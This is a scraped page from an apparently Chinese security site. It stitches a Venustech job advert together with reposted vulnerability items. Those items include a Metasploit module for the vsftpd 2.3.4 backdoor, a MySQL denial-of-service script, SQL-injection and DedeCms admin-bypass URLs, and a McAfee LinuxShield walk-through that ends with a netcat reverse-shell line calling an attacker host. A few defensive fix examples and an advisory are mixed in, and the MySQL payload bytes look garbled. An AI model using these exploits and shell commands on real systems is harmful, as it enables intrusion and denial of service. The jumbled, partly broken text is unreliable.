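[Recruitment] [Hiring] Venustech (启明星辰) R&D Recruitment

  • Position: Other
  • Company name: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • Online QQ:
  • Security assistant: Recruiting/job hunting through the 非安全中国 administrators, QQ group: 57116771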


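  • ++++++++++ About Venustech (启明星辰) ++++++++++

    Just send me a message through the site.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Develop and maintain software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming

    2. Skilled in using the Linux operating system; proficient in C programming on Linux

    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis

    4. Familiar with network security protocols and with routers, switches, firewalls and other security devices

    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. Responsible for system testing and integration testing of products

    2. Responsible for writing, executing and revising product test cases

    3. Responsible for product performance testing

    4. Responsible for support and testing work on external projects

    Requirements:

    1. Basic knowledge of TCP/IP

    2. Solid data-communications fundamentals

    3. Some grounding in Linux

    4. Able to set up and use databases

    5. Familiar with at least one programming language: C/Perl/VBS/TCL

    6. Familiar with test case design, system testing and stress testing

    7. Familiar with firewall principles, with some understanding of firewall features

    8. Some understanding of how network security devices are deployed in a network

    9. Able to use testing tools: Loadrunner, packet analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Deliver Trojan detection services and web vulnerability scanning services

    2. Provide technical support to service customers

    3. Research web Trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and the like

    4. Routinely upgrade and maintain the security event libraries of products such as IDS/IPS/UTM/TDS/WAG/322

    5. Research attack techniques, the TCP/IP protocols, and reverse engineering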

     


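    非安全中国 disclaimer: 1. All statements and images in this post are solely the personal opinions of the poster and do not represent the position of this site;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer" statement (《关于版权及免责声明》) and enjoys the related rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post;
    4. Parts of this post are reposted from other media and published on this site; the purpose of reposting is to pass on more information, and it does not mean that this site endorses the views or is responsible for their authenticity;
    5. If this post infringes the copyright of your site or of you personally, please notify this site immediately; this site will delete it promptly and offers its deepest apologies;
    6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.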

    VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'    => 2000,
              'BadChars' => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget' => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end

    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.

    WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 Remote Denial-of-Service Vulnerability

    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")

    buf2=("x11x00x00x00x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "[*] Connect"
        s.send(buf)
        print "[*] Payload 1 sent"
        s.send(buf2)
        print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()


    Step-by-step Linux installation: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    DedeCms (织梦) v5.6-5.7 Unauthorized Access Vulnerability

    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA code and you get straight into the site's admin back end.

    This vulnerability can only be exploited if the admin back-end path is known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
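Why the recursive check in the DedeCms fix matters, as an added example (a Python model, not DedeCms code and not part of the original post): both filters from include/common.inc.php are run against the nested `_POST[GLOBALS][cfg_dbhost]` parameter shape seen in the URL above. `parse_php_query` is a simplified stand-in for PHP's own request parsing, and the host value is a constructed placeholder.

```python
import re
from urllib.parse import parse_qsl

# Same pattern as the PHP filters: names starting with cfg_ or GLOBALS.
FORBIDDEN = re.compile(r'^(cfg_|GLOBALS)')


def parse_php_query(query):
    """Simplified model (assumption) of how PHP turns a[b][c]=v into nested arrays."""
    root = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.partition('[')[0]
        # "_POST[GLOBALS][cfg_dbhost]" -> ["_POST", "GLOBALS", "cfg_dbhost"]
        keys = [base] + re.findall(r'\[([^\[\]]*)\]', name[len(base):])
        node = root
        for key in keys[:-1]:
            child = node.get(key)
            if not isinstance(child, dict):
                child = node[key] = {}
            node = child
        node[keys[-1]] = value
    return root


def old_filter(request):
    """Original check: only the top-level parameter names are tested."""
    for key in request:
        if len(key) > 0 and FORBIDDEN.search(key):
            return False  # PHP: exit('Request var not allow!')
    return True


def check_request(val):
    """Replacement check: recurse through arrays, testing every key and every scalar value."""
    if isinstance(val, dict):
        return all(check_request(k) and check_request(v) for k, v in val.items())
    return not (len(val) > 0 and FORBIDDEN.search(val))


# Constructed requests; 192.0.2.10 is a documentation-range placeholder host.
DIRECT = 'cfg_dbhost=192.0.2.10'
NESTED = 'userid=admin&_POST[GLOBALS][cfg_dbhost]=192.0.2.10'
BENIGN = 'dopost=login&userid=admin'


def verdicts(query):
    """Return (old filter allows?, recursive filter allows?) for one query string."""
    request = parse_php_query(query)
    return old_filter(request), check_request(request)


if __name__ == '__main__':
    for label, query in (('direct', DIRECT), ('nested', NESTED), ('benign', BENIGN)):
        print(label, verdicts(query))
```

The recursive version also rejects scalar values that begin with `cfg_` or `GLOBALS`, exactly as the PHP replacement does, so a request such as `note=cfg_test` is refused by the new filter but not the old one.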

    Step-by-step Linux installation: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

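    Multiple Security Vulnerabilities in the Django Development Framework

    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Description:

    Django is an open-source web application framework written in Python.
    Django contains multiple security vulnerabilities that allow attackers to obtain sensitive information, manipulate data, carry out cache poisoning attacks, or cause denial of service.
    1) When a cache backend is used, an error in session handling in django.contrib.sessions can be exploited to manipulate session information. Successful exploitation requires that the session key is known and that the application allows the attacker to store dictionary-like objects in the cache under a valid session key.
    2) The Django model system includes a field type, URLField, that validates that the supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify the supplied URL and resolve it. By default the underlying socket has no timeout, so an attacker can exploit this by sending a specially crafted URL to consume all server memory, causing denial of service.
    3) An error exists in the handling of redirect responses when verifying URLs supplied to the "URLField" field type; an attacker can exploit this by returning a redirect response to a "file://" URL, making it possible to determine whether local files exist on the server.
    4) An error exists in the handling of the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses; an attacker can exploit this to carry out cache poisoning attacks.

    References:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/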
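Item 4 of the Django advisory above, as an added example (a framework-free Python model, not Django's code and not part of the original post): a redirect URL built from a client-supplied X-Forwarded-Host ends up in a shared cache entry, while the hardened builder honours the header only behind a trusted proxy and allowlists the result. `ALLOWED_HOSTS`, the function names and the example.com / example.net hosts are constructed for illustration.

```python
from urllib.parse import urlsplit

# Hypothetical site configuration for this example.
ALLOWED_HOSTS = {'shop.example.com', 'www.example.com'}


def naive_absolute_url(headers, path):
    """Behaviour described in item 4: X-Forwarded-Host is trusted from any client."""
    host = headers.get('X-Forwarded-Host') or headers.get('Host', '')
    return 'http://%s%s' % (host, path)


def safe_absolute_url(headers, path, behind_trusted_proxy=False):
    """Honour X-Forwarded-Host only behind a proxy known to set it, then allowlist the host."""
    host = headers.get('Host', '')
    if behind_trusted_proxy and headers.get('X-Forwarded-Host'):
        host = headers['X-Forwarded-Host']
    parts = urlsplit('//' + host.strip().lower())
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError('untrusted host header: %r' % host)
    # Rebuild the authority from parsed pieces so stray userinfo or path text is dropped.
    netloc = parts.hostname if parts.port is None else '%s:%d' % (parts.hostname, parts.port)
    return 'http://%s%s' % (netloc, path)


def cached_redirect(cache, headers, path, builder):
    """Toy shared cache keyed only by path, i.e. the header is not part of the cache key."""
    if path not in cache:
        cache[path] = builder(headers, path + '/')
    return cache[path]


def poisoning_demo(builder):
    """Return the redirect a later, ordinary visitor receives after a request with a forged header."""
    cache = {}
    forged = {'Host': 'shop.example.com', 'X-Forwarded-Host': 'evil.example.net'}
    visitor = {'Host': 'shop.example.com'}
    try:
        cached_redirect(cache, forged, '/account', builder)
    except ValueError:
        pass  # hardened builder refused the request, so nothing was cached
    return cached_redirect(cache, visitor, '/account', builder)


if __name__ == '__main__':
    print('naive   :', poisoning_demo(naive_absolute_url))
    print('hardened:', poisoning_demo(safe_absolute_url))
```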

    McAfee LinuxShield Local/Remote Code Execution Vulnerability

    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local exploit: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed
    - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do
    configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and
    execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    xmlns:ns="naSiteLi
    st" GlobalVersion="20030131003110"
    LocalVersion="20091209
    161903" Type="Client"><SiteList
    Default="1" Name="SomeGU
    ID"><HttpSite Type="repository"
    Name="EvilRepo" Order="1
    " Server="<attackerhost>:80"
    Enabled="1" Local="1"><Rela
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    rName></
    UserName><Password
    Encrypted="0"/></HttpSite></SiteList></
    ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    ss nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    mp;exclude:false timetable=type=unscheduled taskResults=0 i
    _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
    2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
    the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory